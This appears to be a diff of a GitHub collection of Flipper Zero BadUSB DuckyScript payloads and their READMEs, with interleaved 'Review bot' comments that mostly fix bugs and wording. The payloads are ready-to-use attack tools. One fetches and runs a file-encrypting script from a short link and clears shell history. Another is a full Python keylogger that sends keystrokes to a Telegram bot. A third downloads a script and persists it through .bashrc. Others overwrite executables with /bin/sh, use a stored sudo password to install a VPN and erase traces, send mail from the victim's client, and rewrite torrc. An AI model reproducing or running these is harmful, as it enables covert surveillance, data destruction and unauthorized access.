REM In summary, the code encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm and overwrites the original content with the encrypted content.
REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING curl bit.ly/EncryptAllDocuments > script.py
ENTER
REM It depends by the internet connection, btw 2/3 seconds is a lot for a fiew text line...
DELAY 2000
STIRNG python3 script.py; history -c; exit;
ENTER
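Review bot: `STRING curl bit.ly/EncryptAllDocuments > script.py` executes whatever a URL shortener resolves to at run time, with no scheme (curl defaults to plain HTTP), no pinned commit or checksum and no `-L`/`-f`; anyone who controls that short link, or sits on the unencrypted hop, controls the code that `python3 script.py` runs on the target. Fetch the script from a versioned raw URL over HTTPS and check a digest before running it, or embed it in the payload. The REM block is also the only place the destructive behaviour is spelled out; the README for this payload should carry the same warning.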
@@ -0,0 +1,53 @@
# Exploiting An Executable File - Linux ✅
Plug-And-Play ❤️
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Remember that any execution that is not permitted is not legitimate**.
## Getting Started
### Dependencies
* Linux system
### Settings
* You can edit the content that you want to put into the executable file (line 10 of the script.sh).
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
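Review bot: the claim "An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable" is misleading: the finder only reports files that are already readable, writable and executable by the user running it, who could `chmod +x` any of their own files anyway. What it is actually useful for is locating user-writable executables that a more privileged context (a cron job, a service, another user) later runs, and the script does not check who executes them; the README should say that. The "line 10 of the script.sh" pointer is fragile too; name the commented `echo "/bin/sh" > "$file"` line instead.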
@@ -0,0 +1,81 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRING USER=$(whoami)
ENTER
DELAY 500
STRING DIR=/home/$USER/Documents
ENTER
DELAY 500
REM #### Function Definition ####
STRING function search_file {
ENTER
DELAY 500
STRING for file in "$1"/*; do
ENTER
DELAY 500
STRING if [[ -d "$file" ]]; then
ENTER
DELAY 500
STRING search_file "$file"
ENTER
DELAY 500
STRING elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
ENTER
DELAY 500
STRING echo "File Found: $file"
ENTER
DELAY 500
REM Decomment it if you want to put "/bin/sh" into the files, else do what you want
STRING # echo "/bin/sh" > "\$file"
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM #### Function Run ####
STRING search_file "$DIR"
ENTER
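Review bot: `STRING # echo "/bin/sh" > "\$file"` types a literal backslash; inside a double-quoted string `\$` becomes a plain `$`, so once the line is uncommented the redirection targets a file literally named `$file` in the current directory rather than the loop variable. The function body is entered line by line at an interactive prompt, where `"$file"` is not expanded until the function runs, so no escape is needed; the companion script.sh has it right. `STRING DIR=/home/$USER/Documents` also assumes the home directory layout; `"$HOME/Documents"` is the portable form.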
@@ -0,0 +1,19 @@
#!/bin/bash
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file"
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file"
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami)
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents
search_file "$DIR"
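Review bot: `for file in "$1"/*` skips dotfiles and dot-directories, so anything under a hidden directory inside `Documents` is never examined; `find "$DIR" -type f -readable -writable -executable` (GNU find) walks everything in one line with the same per-user permission test and no recursion. `DIR=/home/$USER/Documents` should be `"$HOME/Documents"`, which also works for home directories outside `/home`. A header comment stating the intent (list user-writable executables) would help, since the commented `echo "/bin/sh" > "$file"` is the only hint.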
@@ -0,0 +1,61 @@
# Persistent Keylogger - Telegram Based
A script used to configure a persistent keylogger on a Linux computer trough a pre-configured Telegram Bot.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Dependencies
* Internet Connection
## Description
A script used to configure a persistent keylogger on a Linux computer trough a pre-configured Telegram Bot.
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
In the script, you can find two classes that inherit Thread called Keylogger and Sender, and a shared memory class called Log. The Thread classes perform two distinct tasks:
- Keylogger: The Keylogger class is responsible for capturing the pressed keys using the keyboard library. Based on the detected key, a modified callback function specified in the function call is invoked. When the usage of a certain keyboard key is detected, it is subsequently added to the log variable using the `add_to_log()` method of the `self.log` object from the Log class.
- Sender: The Sender class represents a thread solely dedicated to periodically invoking the `send_log()` method of the `self.log` object from the Log class.
- Log: The Log class represents a shared memory entity. The shared memory is the variable `self.log`, which is periodically managed through the `add_to_log()` and `send_log()` methods. This class was designed with the aim of avoiding data loss, and thus a lock management system was applied to prevent undesirable or unexpected situations when multiple users write rapidly. To handle the locks, `RLock` and `Condition` were chosen in the respective methods of the class.
The `add_to_log(self, log)` method acquires the lock through the invocation of `with self.lock` and updates the internal variable with the new received character. As the only waiting condition on the lock management is when the variable `self.lock` is empty, immediately after updating the internal variable, the unlocking function `self.condition.notify_all()` is invoked, allowing all threads (in this case, actually only 1, the Sender) to wake up and proceed with the sending operation.
The `send_log(self)` method acquires the lock and enters a waiting condition using `self.condition.wait()` if the variable `self.log` is empty. Once the lock is reacquired following a wake-up, the Sender Thread proceeds with sending the message using the `bot.send_message(...)` command, resetting the `self.log` variable to an empty initial state.
It is worth noting that although this Telegram bot could be used dynamically by anyone, it might be a good practice to use the ID statically (line 16 of the Python file) since the message recipients will always be you and not someone else (at least it shouldn't be so). This aspect may be considered less secure as it exposes sensitive and delicate information concerning your privacy and identity. However, since this script is not intended for malicious purposes or real-world use, but rather for educational purposes, it has been thoughtfully created and designed for study purposes.
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
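Review bot: the last paragraph ("the script divides the output of the command into a theoretically infinite chunk of 1000 characters") describes the reverse-shell script, not this one: keylogger.py sends `self.log` in a single `bot.send_message` call and never splits it, so either drop the paragraph or make it describe the actual behaviour. Two smaller points in the same section: "the only waiting condition ... is when the variable `self.lock` is empty" should read `self.log` (the lock is never "empty"; `send_log` waits while the log string is empty), and "trough" should be "through" in both the intro and the Description. Dependencies lists only "Internet Connection", but the script imports `telebot` (pyTelegramBotAPI) and `keyboard`, which are third-party packages; list them.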
@@ -0,0 +1,79 @@
from telebot import TeleBot
from time import sleep
import keyboard
from threading import Thread,RLock,Condition
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
class Log:
def __init__(self):
self.log = ""
self.lock = RLock()
self.condition = Condition(self.lock)
# Set here the Telegram user id
self.id = "0123456789"
def add_to_log(self, log):
with self.lock:
#print("Adding to log...")
self.log += log
self.condition.notify_all()
def send_log(self):
with self.lock:
#print("Sending to bot...")
while self.log == "":
#print("Waiting resources...")
self.condition.wait()
#print("Sending message!")
bot.send_message(self.id, self.log)
self.log = ""
class Keylogger(Thread):
def __init__(self, log):
super().__init__()
self.log = log
def callback(self, event):
name = event.name
if len(name) > 1:
if name == "space":
name = "[SPACE]"
elif name == "enter":
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
#print(f"Keylogger add to log: {name}")
self.log.add_to_log(name)
def run(self):
keyboard.on_release(callback=self.callback)
class Sender(Thread):
def __init__(self, log):
super().__init__()
self.log = log
def run(self):
while True:
sleep(5)
#print("Sender send log")
self.log.send_log()
log = Log()
keylogger = Keylogger(log)
keylogger.start()
sender = Sender(log)
sender.start()
bot.infinity_polling()
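Review bot: `Keylogger.run` only calls `keyboard.on_release(callback=self.callback)` and returns, so the thread exits immediately after registering the hook and the `Thread` subclass adds nothing; either make it a plain function or comment that the callback runs on the keyboard library's own listener thread, not on this one. The README's reference to "line 16 of the Python file" for the user id should also be replaced with the name `self.id`, since line references go stale as soon as the file is edited.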
@@ -0,0 +1,25 @@
REM ########################################################
REM # #
REM # Title : Persistent Keylogger - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ########################################################
REM Requirements:
REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN_BLOCK
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
python3 connection.py &
fi" >> .bashrc; exit
END_STRINGLN
@@ -0,0 +1,77 @@
# Send Email Through Thunderbird
This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
This payload opens a shell (or powershell if running on windows), starts the Thunderbird application, and via the CTRL N sequence starts the email sending functionality that is not protected by any security system. After that it writes the recipient's email, the subject of the email and the body of the message and sends.
## Getting Started
### Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000
```
### Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN thunderbird
DELAY 4000
```
### Dependencies
* Internet Connection
* Thunderbird installed and email configured
### Settings
- Receiver email address
- Email Subject
- Email Message
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
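Review bot: "starts the email sending functionality that is not protected by any security system" is imprecise: Thunderbird's compose window simply inherits the already-authenticated mail account of the logged-in session, so the control that prevents this payload is the session itself (a screen locked whenever the machine is unattended), not anything inside Thunderbird, and the README should say so. The Getting Started section also shows both a Windows 11 and an Ubuntu 23.04 opener, but payload.txt contains only the `GUI r`/`powershell` branch; reconcile the README with what the payload file actually does.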
@@ -0,0 +1,63 @@
REM ########################################################
REM # |
REM # Title : Send Email Through Thunderbird |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 - Linux(debian tested) |
REM # |
REM ########################################################
REM Requirements:
REM - Internet Connection
REM - Thunderbird installed and email configured
REM This payload is tested on:
REM - Ubuntu 23.04
REM - Windows 11
REM REQUIRED - Set receiver email address
DEFINE EMAIL-ADDRESS example@hak5.org
REM REQUIRED - Set email Subject
DEFINE SUBJECT example
REM REQUIRED - Set email message
DEFINE MESSAGE example
REM # PowerShell
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000
REM # Thunderbird
CTRL n
DELAY 2000
STRING EMAIL-ADDRESS
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
STRING SUBJECT
DELAY 500
TAB
DELAY 500
STRING MESSAGE
DELAY 500
CTRL ENTER
DELAY 2000
ENTER
REM # End actions
DELAY 2000
ALT F4
DELAY 1000
ALT F4
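Review bot: the header claims `Target : Windows 10/11 - Linux(debian tested)` and "tested on Ubuntu 23.04", but the body contains only the Windows path (`GUI r`, `STRING powershell`, `Start-Process "thunderbird.exe"`), so the Linux claim does not match the file; fix the header to describe what it does. Separately, `DEFINE EMAIL-ADDRESS example@hak5.org` ships a real domain as the default recipient; use a reserved one such as example.com so an untouched test run cannot mail a third party.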
@@ -0,0 +1,52 @@
# Set Arbitrary VPN - Linux ✅
A script used to set an arbitrary VPN on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to set an arbitrary VPN on a Linux machine.
Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
### Settings
* Set the VPN file link
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
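Review bot: "Dependencies: Permissions" hides the real requirement, which payload.txt makes explicit with `DEFINE SUDO_PASS`: the target's sudo password must be known in advance and is stored in cleartext in the payload file, so anyone holding the Flipper or its SD card holds the root password of that machine. State that in the README. "erase traces" also overstates what the payload does: `history -c` clears only the root shell's in-memory history, the `sudo` authentication is still recorded by the system's auth logging, and the tunnel it sets up remains visible as a running openvpn process and network interface.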
@@ -0,0 +1,70 @@
REM ####################################
REM # |
REM # Title : Set Arbitrary VPN |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ####################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### VPN SECTION ####
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
REM It depends by the internet connection
DELAY 2000
STRING openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
STRING history -c
ENTER
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
DELAY 500
REM Close the shell
STRING exit
ENTER
@@ -0,0 +1,174 @@
# Set An Arbitrary And Persistent Tor Circuit
> _This description comes from the publication of the script on Hak5 and therefore reports specific features of advanced Hak5 devices._
>
> _However, the payload has been adapted appropriately so that it works on FlipperZero._
The "Set An Arbitrary And Persistent Tor Circuit" script is a payload designed to empower users to customize their Tor circuit according to their preferences using Duckyscript language. This payload provides the flexibility to set arbitrary Tor nodes and manually create a persistent circuit.
This script is highly versatile, as it is compatible with both Linux and Windows operating systems, thanks to the integration of the PASSIVE_WINDOWS_DETECT\[[1](#sources)] extension, enabling automatic system detection. Although testing on MacOS was not possible, it is likely that the payload can also be used on this operating system. This extension includes its own passive detect ready optimizing execution times making the entire process more efficient.
It is essential to emphasize that the use of this script must comply with local laws and respect the privacy of others. The primary goal of "Set An Arbitrary And Persistent Tor Circuit" is to provide users with more direct control over their Tor connection, allowing them to customize and further enhance their online browsing experience.
**Category**: Execution
![1](assets/1.gif)
*Dynamic visualization of the script in action. In this case I modified only the MiddleNode so that the persistence of the modification is shown but the full use of the payload results in immodifiability and persistence of all 3 nodes.*
_**Note**: The nodes are unmodifiable unless the initial Tor settings are restored or unless the torrc file is subsequently modified by removing the configurations made._
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Index
- [Set An Arbitrary And Persistent Tor Circuit](#set-an-arbitrary-and-static-tor-circuit)
- [Payload Description](#payload-description)
- [Note](#note)
- [Tor Configuration](#tor-configuration)
- - [Description of the Tor Circuit](#description-of-the-tor-circuit)
- - [Torrc Configuration File](#torrc-configuration-file)
- [Tor University Challenge by EFF](#tor-university-challenge-by-eff) *Off-topic*
- [Sources](#sources)
- [Credits](#credits)
## Payload Description
**Requirements:**
- Tor installed
- Fingerprints of your relays
**Notes:**
- Payload tested using TorBrowser 13.0.8 based on Mozilla Firefox 115.6.0esr ENG
- Payload tested on Windows 11_eng; Debian 12_eng; Ubuntu 23.10_eng;
To find fingerprints of various nodes you can go to https://metrics.torproject.org and set up a search based on what you are interested in such as country, node name, etc... For example if you try to search for '**Aleff**' it will send you to my [Tor Relay page](https://metrics.torproject.org/rs.html#details/B8C9DF8404FE175E37241774856907184A667ED2) (_Unless someone has created other Relays with the same name in the meantime_) where you can find the fingerprint information which is the data you are interested in.
![](https://i.ibb.co/YN5515G/tor-node.png)
The script begins by defining the fingerprints of the entry, middle, and exit nodes using the `DEFINE` commands. Additionally, it provides instructions for activating administrator permissions, with specific considerations for systems like Debian and Ubuntu.
**Configuration on Linux:**
- If the operating system is Linux, the user must provide the command to obtain root privileges (`#root_permission_command`) as `sudo su` instead of `su` and the associated password (`#sudo_pass`).
**Configuration on Windows:**
- If the operating system is Windows, the script opens TorBrowser using Windows GUI commands.
- Is not needed the root privileges
- It overwrites all the old data with the new data defined at the beginning of the script.
The script aims to edit the Tor configuration process to ensure the specific use of entry, middle, and exit nodes. Users need to customize the node fingerprints and provide specific operating system information to ensure the correct operation of the script on the target platform.
In any case, the script is designed to completely overwrite the old configuration of the torrc file, so be very careful how you use it since it could be an irreversible change and could cause a loss of data.
## Note
- The payload is designed to run on a Windows or Linux system and requires Tor to be installed.
- **#EntryNode**, **#MiddleNode**, **#ExitNode**: These variables must contain the fingerprint of the relays you want to use as nodes in your circuit.
- **#root_permission_command**: Activation of administrator permissions may vary from system to system. For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'. In general this can vary and is information that could be crucial in case the target has tampered with this functionality.
- **#sudo_pass**: Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.
- **#const_var**: Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
- **EXTENSION**: Through the use of the PASSIVE_WINDOWS_DETECT\[[1](#sources)] extension, it is possible to detect the operating system on which the payload is launched, which, in this case, can be differentiated between Windows or any other operating system, which in our case corresponds to Linux. This powerful extension also allows you to determine when the system is ready to use since it includes the extension the passive Detect Ready. Using this extension not only makes it possible to use this payload dynamically on multiple systems, but also makes it extremely more efficient.
## Tor Configuration
![Tor](https://upload.wikimedia.org/wikipedia/commons/thumb/1/15/Tor-logo-2011-flat.svg/459px-Tor-logo-2011-flat.svg.png)
### Description of the Tor Circuit
The Tor circuit is a fundamental component of the infrastructure that ensures anonymity and security in online communications. The Tor circuit consists of three types of nodes, each with a specific role: Entry Node, Middle Node, and Exit Node.
![Tor Circuit](https://upload.wikimedia.org/wikipedia/commons/d/dc/Tor-onion-network.png)
1. **Entry Node:**
- The Entry Node is the first node in the Tor circuit.
- When a user initiates a connection through Tor, the traffic is encrypted and sent to the Entry Node.
- The Entry Node is aware of the user's IP address but cannot see the final destination of the traffic.
- Its primary function is to pass it to the next node, so the Middle Node, without knowing the ultimate destination.
2. **Middle Node:**
- The Middle Node is the second node in the Tor circuit.
- It receives encrypted traffic from the Entry Node and forwards it to the next node in the chain, which can be another Middle Node or the Exit Node.
- The Middle Node is not aware of the user's IP address or the final destination of the traffic.
- Its main function is to further enhance anonymity since it lacks information about the origin or destination of the traffic.
3. **Exit Node:**
- The Exit Node is the last node in the Tor circuit.
- It receives encrypted traffic from the Middle Node and decrypts it before sending it to the final destination on the internet.
- The Exit Node is aware of the destination address but does not know the user's IP address or the entry nodes in the circuit.
- Its primary function is to provide a point of exit for the traffic while maintaining the anonymity of the user.
### Torrc Configuration File
The `torrc` configuration file is a crucial component of the Tor, governing the behavior and settings of the Tor network on a particular system. This plaintext configuration file is typically named "torrc" and is utilized to customize various aspects of Tor's operation. Here's an overview of the key elements found in the `torrc` file:
1. **Entry, Middle, and Exit Nodes Configuration:**
- Users can specify the fingerprints or identities of preferred Entry, Middle, and Exit nodes using directives like `EntryNodes`, `MiddleNodes`, and `ExitNodes`. This allows users to influence the selection of these nodes in their Tor circuit for enhanced control or security. *This functionality is used in this payload.*
2. **General Tor Configuration:**
- The `torrc` file includes parameters for configuring the general behavior of Tor. This may involve settings such as the port on which Tor listens, bandwidth limits, logging preferences, and whether the system should act as a relay or only as a client.
3. **Bridge Configuration:**
- For users in regions with restricted access to the Tor network, the `torrc` file allows the configuration of bridge relays. Bridge relays help users bypass censorship by providing an alternative entry point to the Tor network.
4. **Hidden Service Configuration:**
- Users hosting Tor hidden services can configure their services through the `torrc` file. This includes defining the service's port, authentication methods, and other related parameters.
5. **Logging and Debugging:**
- The file provides options for configuring logging levels and debugging information. Users can tailor the amount of detail Tor logs, facilitating troubleshooting and analysis.
6. **Security Settings:**
- Various security-related options can be configured in the `torrc` file, such as restricting certain features or specifying the behavior of Tor in response to specific security events.
7. **Network and Protocol Settings:**
- Users can fine-tune Tor's network and protocol settings in the `torrc` file, influencing aspects such as circuit creation, DNS resolution, and transport protocols.
Customizing the `torrc` file allows users to tailor Tor's behavior to their specific needs and security requirements. However, users should exercise caution and adhere to Tor's best practices to ensure the continued effectiveness and anonymity of their Tor usage.
> See the [sources](#sources) section for more on this topic.
## Tor University Challenge by EFF
*Off-Topic*
![](https://www.eff.org/files/banner_library/banner-tor-monions.png)
Tor is a valuable tool for browsing the web anonymously, but since it's powered by volunteers willing to share some bandwidth and a computer, it's always in need of additional help. Which is why EFF is announcing the Tor University Challenge, a project asking universities to start running Tor relays on campus. Today, we're launching with support from 12 universities. With your help, we can add more universities to strengthen the Tor network to improve one of the best free privacy tools available today.
*Source: https://www.eff.org/deeplinks/2023/08/announcing-tor-university-challenge*
> If you are interested in finding out more about Tor and EFF's initiative, you can learn more at the official page of [Tor University Challenge](https://toruniversity.eff.org/).
## Sources
1. Passive Windows Detect - https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
2. Select the relays - https://metrics.torproject.org/rs.html
3. torrc - https://support.torproject.org/glossary/torrc/
4. Official torrc documentation and so on - https://2019.www.torproject.org/docs/tor-manual.html.en
5. Tor University Challenge - https://toruniversity.eff.org/
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
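Review bot: the claim that pinning nodes lets users "customize and further enhance their online browsing experience" needs the caveat Tor's own documentation gives: route selection should be left to Tor, because forcing fixed relays for all three hops removes the random path selection the anonymity model relies on, so the circuit is only as trustworthy as the three relays chosen and an observer of those relays sees every circuit this client builds. Put that next to the "irreversible change" warning. Also the Index link `#set-an-arbitrary-and-static-tor-circuit` does not match the heading "Set An Arbitrary And Persistent Tor Circuit" (GitHub generates `#set-an-arbitrary-and-persistent-tor-circuit`), and the "Configuration on Windows" and PASSIVE_WINDOWS_DETECT paragraphs describe the Hak5 version: the payload.txt in this commit targets Linux only and contains no OS detection.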
@@ -0,0 +1,53 @@
REM ################################################################
REM # |
REM # Title : Set An Arbitrary And Persistent Tor Circuit |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################################
REM Requirements:
REM - Tor installed
REM - Fingerprints of your relays
REM Note:
REM - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG
REM - Payload tested on Debian 12_eng; Ubuntu 23.10_eng;
REM Set the Fingerprints here
DEFINE #EntryNode example
DEFINE #MiddleNode example
DEFINE #ExitNode example
REM Activation of administrator permissions may vary from system to system.
REM For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'.
REM In general this can vary and is information that could be crucial in case the target has tampered with this functionality.
DEFINE #root_permission_command sudo su
REM Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.
DEFINE #sudo_pass example
REM Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
DEFINE #const_entry_node EntryNodes
DEFINE #const_middle_node MiddleNodes
DEFINE #const_exit_node ExitNodes
DELAY 2000
REM Opens a new terminal and login with administrator permissions.
CTRL-ALT t
STRINGLN #root_permission_command
DELAY 500
STRING #sudo_pass
DELAY 1000
REM Writes the new configuration into the torrc file deleting all the previous settings.
STRINGLN
echo "#const_entry_node #EntryNode
#const_middle_node #MiddleNode
#const_exit_node #ExitNode" > /etc/tor/torrc
END_STRINGLN
REM Then exit from the super user and close the terminal
DELAY 500
STRINGLN exit
ALT F4
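Review bot: the Note says the payload was tested with TorBrowser, but `> /etc/tor/torrc` rewrites the configuration of the system `tor` daemon (the Debian/Ubuntu package), which Tor Browser does not read because it bundles its own tor and its own torrc; reconcile the note with what the file changes. The header should also carry the README's warning that the `>` redirect discards every other directive previously in /etc/tor/torrc. Typo: "Firefoz" should be "Firefox".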
@@ -0,0 +1,62 @@
# Telegram Persistent Connection Linux
A script used to configure a persistent connection on a Linux computer trough a pre-configured Telegram Bot.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to configure a persistent connesction on a Linux computer trough a pre-configured Telegram Bot.
Opens a shell, download the python script trough the `curl` command outputing the file into a `connection.py` file using `-o` option, then run it and set the run of the program as a default command every times a shell is runned.
This payload is intended as a basic reference point for developing payloads on a persistent connection Telegram based.
## Getting Started
### Dependencies
* Internet Connection
### Settings
- **Telegram Bot**: You should configure a bot trough Telegram. If you don't know how to do this, follow the guide about [Telegram Bot guide](#telegram-bot-guide). When you have create your personal Telegram Bot you should get the Telegram bot ID that you must put into the variable BOT_TOKEN at line 4 in the Python file as you can read in the line 3 comment.
